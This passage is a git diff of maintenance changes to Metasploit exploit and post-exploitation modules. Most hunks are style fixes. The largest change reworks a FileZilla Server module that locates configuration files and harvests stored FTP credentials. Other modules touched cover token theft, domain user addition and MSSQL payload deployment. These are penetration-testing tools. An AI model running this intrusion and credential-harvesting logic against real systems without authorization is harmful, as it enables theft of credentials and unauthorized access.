'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 5a6bc720a1..6495b396d2 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => @@ -234,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote end =begin -mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c +mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 1c1 < void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2) --- diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index 5177d24d8a..f2d966c158 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index c45b2fbd7b..0c5fd421fe 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 7eb04fa0c4..13c7fdf422 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Payload' => { diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index c9d975e7db..61e4361241 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) end - file = File.join( Msf::Config.data_directory, 'exploits', 'CVE-pending', 'stream.raw') + file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw') f = File.new(file, 'rb') stream = Rex::Java::Serialization::Model::Stream.decode(f) diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 98fda64ef1..d548309299 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote "\r\n\r\n" + "\r\nSelect \"DAV:displayname\" from scope()\r\n\r\n\r\n" - if datastore['InvalidSearchRequest'] == true + if datastore['InvalidSearchRequest'] xml = rand_text(rand(1024) + 32) end diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 75282e68fe..f5c11bf244 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), - OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]), OptString.new('REXENAME', [false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']), diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index 28433df647..7f7d4d2696 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'SSL3', 'PrependMigrate' => true }, 'Payload' => diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index ef25e2a7b6..041554ef94 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote { 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index b3a7e45813..2b8ed7bd4c 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Payload' => { diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index c281adff24..fda5bfcd30 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -377,7 +377,7 @@ exec sp_executesql @z| runme.gsub!(/%STUFF%/, enc) # go! - if (not mssql_login_datastore) + if !mssql_login_datastore fail_with(Failure::NoAccess, "Unable to log in!") end begin @@ -452,7 +452,7 @@ exec sp_executesql @z| return nil end - if (not logged_in) + if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end res = mssql_query("select @@version", datastore['VERBOSE']) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 70d8433c92..f5ad07850b 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), OptString.new('PASSWORD', [true, 'The password for the specified username']) ], self.class) @@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return @@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote } if masterList.length == 1 print_good("Successfully connected to #{server["name"]}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(server["name"],parse_results,true) elsif server["db_sysadmin"] == 1 print_good("Sysadmin on #{server["name"]}") @@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote write_to_report(name,server,parse_results,linked_server_table,link_status) # Display link server information in verbose mode - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else @@ -219,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] # Display status to user - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") @@ -435,14 +435,14 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['DEPLOYLIST']=="" datastore['DEPLOYLIST'] = nil end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - Checking if #{name} is on the deploy list...") end if datastore['DEPLOYLIST'] != nil deploylist = datastore['DEPLOYLIST'].upcase.split(',') end if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is on the deploy list.") end unless shelled.include?(name) @@ -451,7 +451,7 @@ class MetasploitModule < Msf::Exploit::Remote else print_status("Payload already deployed on #{name}") end - elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + elsif !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is not on the deploy list") end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index 3d76870629..7fa63780fa 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote end def check - if (not mssql_login_datastore) + if !mssql_login_datastore vprint_status("Invalid SQL Server credentials") return Exploit::CheckCode::Detected end @@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - if (not mssql_login_datastore) + if !mssql_login_datastore print_status("Invalid SQL Server credentials") return end diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index c94193284d..c9232eafd6 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Payload' => diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 884221e514..2c926ad6a9 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -80,7 +80,7 @@ module MetasploitModule print_status("Photo saved as #{dest}") - if (datastore['AUTOVIEW'] == true) + if datastore['AUTOVIEW'] print_status("Opening photo in a web browser...") Rex::Compat.open_browser(File.expand_path(dest)) end diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index af967b3f6f..0008a53ab7 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -73,6 +73,8 @@ class MetasploitModule < Msf::Post def os_set_wallpaper(file) if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i platform = 'osx' + else + platform = session.platform end case platform when /osx/ diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 1d2b5e94c5..e127602c7c 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -37,36 +37,59 @@ class MetasploitModule < Msf::Post return end - @progs = "#{session.sys.config.getenv('ProgramFiles')}\\" + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432') + locations = [] + progfiles_env.each do |k, v| + next if v.blank? + locations << v + "\\FileZilla Server\\" + end - filezilla = check_filezilla + keys = [ + "HKLM\\SOFTWARE\\FileZilla Server", + "HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server", + ] + + keys.each do |key| + begin + root_key, base_key = session.sys.registry.splitkey(key) + value = session.sys.registry.query_value_direct(root_key, base_key, "install_dir") + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + next + end + locations << value.data + "\\" + end + + locations = locations.uniq + filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla end - def check_filezilla + def check_filezilla(locations) paths = [] - path = @progs + "FileZilla Server\\" - - print_status("Checking for Filezilla Server directory in: #{path}") - begin - session.fs.dir.entries(path) + locations.each do |location| + print_status("Checking for Filezilla Server directory in: #{location}") + begin + session.fs.dir.foreach("#{location}") do |fdir| + ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| + if fdir == xmlfile + filepath = location + xmlfile + print_good("Configuration file found: #{filepath}") + paths << filepath + end + end + end + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + end rescue ::Exception => e print_error(e.to_s) return end - session.fs.dir.foreach(path) do |fdir| - ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| - if fdir == xmlfile - filepath = path + xmlfile - vprint_status("Configuration file found: #{filepath}") - paths << filepath - end - end - end - if !paths.empty? print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line @@ -160,7 +183,7 @@ class MetasploitModule < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['ftp_port'], service_name: 'ftp', protocol: 'tcp', @@ -189,7 +212,7 @@ class MetasploitModule < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end perms.each do |perm| @@ -201,13 +224,12 @@ class MetasploitModule < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) # report the goods! - if config['ftp_port'] == "" + if config['admin_pass'] == "" vprint_status("Detected Default Adminstration Settings:") - config['ftp_port'] = "21" else vprint_status("Collected the following configuration details:") service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['admin_port'], service_name: 'filezilla-admin', protocol: 'tcp', @@ -235,7 +257,7 @@ class MetasploitModule < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end vprint_status(" FTP Port: #{config['ftp_port']}") @@ -249,31 +271,33 @@ class MetasploitModule < Msf::Post configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']] + begin + lastser = parse_interface(fsi_xml) + lastserver << [lastser['ip'], lastser['port'], lastser['password']] + vprint_status("Last Server Information:") + vprint_status(" IP: #{lastser['ip']}") + vprint_status(" Port: #{lastser['port']}") + vprint_status(" Password: #{lastser['password']}") + vprint_line - lastser = parse_interface(fsi_xml) - lastserver << [lastser['ip'], lastser['port'], lastser['password']] - - vprint_status("Last Server Information:") - vprint_status(" IP: #{lastser['ip']}") - vprint_status(" Port: #{lastser['port']}") - vprint_status(" Password: #{lastser['password']}") - vprint_line - - p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, + rescue + vprint_error("Could not parse FileZilla Server Interface.xml") + end + loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") - print_status("Credentials saved in: #{p.to_s}") + print_status("Credentials saved in: #{loot_path}") - p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, + loot_path = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions") - print_status("Permissions saved in: #{p.to_s}") + print_status("Permissions saved in: #{loot_path}") - p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, + loot_path = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration") - print_status(" Config saved in: #{p.to_s}") + print_status(" Config saved in: #{loot_path}") - p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, + loot_path = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, "filezilla_server_lastserver.csv", "FileZilla FTP Last Server") - print_status(" Last server history: #{p.to_s}") + print_status(" Last server history: #{loot_path}") print_line end @@ -289,16 +313,16 @@ class MetasploitModule < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") end opt = doc.elements.to_a("Settings/Item") if opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings settings['admin_port'] = opt[0].text rescue "" - settings['ftp_port'] = "" + settings['ftp_port'] = 21 else - settings['ftp_port'] = opt[0].text rescue "" + settings['ftp_port'] = opt[0].text rescue 21 settings['admin_port'] = opt[16].text rescue "" end settings['admin_pass'] = opt[17].text rescue "" @@ -321,17 +345,14 @@ class MetasploitModule < Msf::Post end settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty? - if settings['ssl'] == "1" - settings['ssl'] = "true" - else - if datastore['SSLCERT'] - print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") - end - settings['ssl'] = "false" + settings['ssl'] = settings['ssl'] == "1" + if !settings['ssl'] && datastore['SSLCERT'] + print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") end settings['ssl_certfile'] = items[45].text rescue "" - if settings['ssl_certfile'] != "" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks + # Get the file if it is there. It could be useful in MITM attacks + if settings['ssl_certfile'] != "" && settings['ssl'] and datastore['SSLCERT'] sslfile = session.fs.file.new(settings['ssl_certfile']) until sslfile.eof? sslcert << sslfile.read @@ -386,7 +407,7 @@ class MetasploitModule < Msf::Post account['host'] = settings['ftp_bindip'] account['port'] = settings['ftp_port'] - account['ssl'] = settings['ssl'] + account['ssl'] = settings['ssl'].to_s creds << account vprint_status(" Username: #{account['user']}") @@ -413,15 +434,23 @@ class MetasploitModule < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") + return lastser end opt = doc.elements.to_a("Settings/Item") - lastser['ip'] = opt[0].text rescue "" - lastser['port'] = opt[1].text rescue "" - lastser['password'] = opt[2].text rescue "" + opt.each do |item| + case item.attributes['name'] + when /Address/ + lastser['ip'] = item.text + when /Port/ + lastser['port'] = item.text + when /Password/ + lastser['password'] = item.text + end + end lastser['password'] = "" if lastser['password'].nil? diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index b8e60b7d88..28e6aec748 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -191,7 +191,7 @@ class MetasploitModule < Msf::Post imail_user = datastore['IMAILUSER'] imail_domain = datastore['IMAILDOMAIN'] - print_status("Download iMail user information...") if datastore['VERBOSE'] == false + vprint_status("Download iMail user information...") #Download user data. If no user specified, we dump it all. users = download_info(imail_user, imail_domain) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 2eb16f4e0a..58f0b43137 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -278,7 +278,7 @@ class MetasploitModule < Msf::Post # If we can impersonate a token, we use that first. # If we can't, we'll try to MIGRATE (more aggressive) if the user wants to got_token = steal_token - if not got_token and datastore["MIGRATE"] + if !got_token && datastore["MIGRATE"] migrate_success = migrate end @@ -330,7 +330,7 @@ class MetasploitModule < Msf::Post end # Migrate back to the original process - if datastore["MIGRATE"] and @old_pid and migrate_success == true + if datastore["MIGRATE"] && @old_pid && migrate_success print_status("Migrating back...") migrate(@old_pid) end diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index d6a5ac35d2..9b83b10a67 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -223,12 +223,11 @@ class MetasploitModule < Msf::Post end ## steal token if neccessary - if (datastore['TOKEN'] == '') - token_found,token_user,current_user = token_hunter(domain) - - return if token_found == false - - datastore['TOKEN'] = token_user if current_user == false + if datastore['TOKEN'] == '' + token_found, token_user, current_user = token_hunter(domain) + if token_found && current_user == false + datastore['TOKEN'] = token_user + end end ## steal token @@ -247,7 +246,7 @@ class MetasploitModule < Msf::Post already_member_group = false ## Add user to the domain - if (datastore['ADDTODOMAIN'] == true) + if datastore['ADDTODOMAIN'] user_add_res = run_cmd("net user \"#{datastore['USERNAME']}\" /domain",false) if (user_add_res =~ /The command completed successfully/ and user_add_res =~ /Domain Users/) @@ -261,7 +260,7 @@ class MetasploitModule < Msf::Post end ## Add user to a domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] ## check if user is already a member of the group group_add_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) @@ -291,7 +290,7 @@ class MetasploitModule < Msf::Post end ## verify user was added to domain or domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] if already_member_group == false net_groups_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index c6fedab05f..695eba3ede 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Post OptString.new('DB_USERNAME', [true, 'New sysadmin login', '']), OptString.new('DB_PASSWORD', [true, 'Password for new sysadmin login', '']), OptString.new('INSTANCE', [false, 'Name of target SQL Server instance', nil]), - OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', 'false']) + OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', false]) ], self.class) end diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index bd917e2343..55b430af9a 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -52,8 +52,8 @@ class MetasploitModule < Msf::Post print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd", START_TYPE_AUTO) end - if datastore['ACTIVE']==true - if datastore['RHOST']==nil + if datastore['ACTIVE'] + if datastore['RHOST'].nil? print_error("RHOST is not set ") return else @@ -65,7 +65,7 @@ class MetasploitModule < Msf::Post print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ") p = prog << " -d -p #{datastore['PORT']} " end - if datastore['NULLAUTH']==true + if datastore['NULLAUTH'] p<< "-n" end run_rpcapd(p) diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index f3cb0e7f49..4ee17a767b 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Post n = datastore['ITERATIONS'] file = datastore['FILE'] - if datastore['ZERO']==true + if datastore['ZERO'] type = 0 print_status("The file will be overwritten with null bytes") end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 99195b7cf0..7e31a2738c 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -36,10 +36,6 @@ module Msf "#{Msf::Config.local_directory}" end - def cmd_nessus_index - nessus_index - end - def commands { "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port ", @@ -84,6 +80,155 @@ module Msf } end + def ncusage + print_status("%redYou must do this before any other commands.%clr") + print_status("Usage: ") + print_status("nessus_connect username:password@hostname:port ") + print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") + print_status("OR") + print_status("nessus_connect username@hostname:port ssl_verify") + print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect hostname:port ssl_verify") + print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect") + print_status("Example:> nessus_connect") + print_status("This only works after you have saved creds with nessus_save") + return + end + + #creates the index of exploit details to make searching for exploits much faster. + def create_xindex + start = Time.now + print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") + count = 0 + #Use Msf::Config.get_config_root as the location. + File.open("#{xindex}", "w+") do |f| + #need to add version line. + f.puts(Msf::Framework::Version) + framework.exploits.sort.each { |refname, mod| + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end + end + end + stuff << "\n" + f.puts(stuff) + } + end + total = Time.now - start + print_status("It has taken : #{total} seconds to build the exploits search index") + end + + def nessus_index + if File.exist?("#{xindex}") + #check if it's version line matches current version. + File.open("#{xindex}") { |f| + line = f.readline + line.chomp! + if line.to_i == Msf::Framework::RepoRevision + print_good("Exploit Index - (#{xindex}) - is valid.") + else + create_xindex + end + } + else + create_xindex + end + end + + def nessus_login + if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) + print_status("You need to connect to a server first.") + ncusage + return + end + @url = "https://#{@host}:#{@port}/" + print_status("Connecting to #{@url} as #{@user}") + @n = Nessus::Client.new(@url, @user, @pass,@sslv) + if @n.authenticated + print_status("User #{@user} authenticated successfully.") + @token = 1 + else + print_error("Error connecting/logging to the server!") + return + end + end + + def nessus_verify_token + if @token.nil? or @token == '' + ncusage + return false + end + true + end + + def valid_policy(*args) + case args.length + when 1 + pid = args[0] + else + print_error("No Policy ID supplied.") + return + end + pol = @n.list_policies + pol["policies"].each { |p| + if p["template_uuid"] == pid + return true + end + } + return false + end + + def nessus_verify_db + if !(framework.db and framework.db.active) + print_error("No database has been configured, please use db_create/db_connect first") + return false + end + true + end + + def check_scan(*args) + case args.length + when 1 + scan_id = args[0] + else + print_error("No scan ID supplied") + return + end + scans = @n.scan_list + scans.each { |scan| + if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" + return true + end + } + return false + end + + def is_scan_complete(scan_id) + complete = false + status = @n.scan_list + status["scans"].each { |scan| + if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") + complete = true + end + } + complete + end + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( 'Columns' => [ @@ -153,82 +298,8 @@ module Msf print_line "" end - def ncusage - print_status("%redYou must do this before any other commands.%clr") - print_status("Usage: ") - print_status("nessus_connect username:password@hostname:port ") - print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") - print_status("OR") - print_status("nessus_connect username@hostname:port ssl_verify") - print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect hostname:port ssl_verify") - print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect") - print_status("Example:> nessus_connect") - print_status("This only works after you have saved creds with nessus_save") - return - end - - #creates the index of exploit details to make searching for exploits much faster. - def create_xindex - start = Time.now - print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") - count = 0 - #Use Msf::Config.get_config_root as the location. - File.open("#{xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" - end - end - end - stuff << "\n" - f.puts(stuff) - } - end - total = Time.now - start - print_status("It has taken : #{total} seconds to build the exploits search index") - end - - def nessus_index - if File.exist?("#{xindex}") - #check if it's version line matches current version. - File.open("#{xindex}") { |f| - line = f.readline - line.chomp! - if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{xindex}) - is valid.") - else - create_xindex - end - } - else - create_xindex - end - end - - def nessus_verify_token - if @token.nil? or @token == '' - ncusage - return false - end - true + def cmd_nessus_index + nessus_index end def cmd_nessus_connect(*args) @@ -326,24 +397,6 @@ module Msf return end - def nessus_login - if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("You need to connect to a server first.") - ncusage - return - end - @url = "https://#{@host}:#{@port}/" - print_status("Connecting to #{@url} as #{@user}") - @n = Nessus::Client.new(@url, @user, @pass,@sslv) - if @n.authenticated - print_status("User #{@user} authenticated successfully.") - @token = 1 - else - print_error("Error connecting/logging to the server!") - return - end - end - def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -370,15 +423,22 @@ module Msf end def cmd_nessus_server_properties(*args) - if args[0] == "-h" - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed") - print_status() - print_status("Returns information about the feed type and 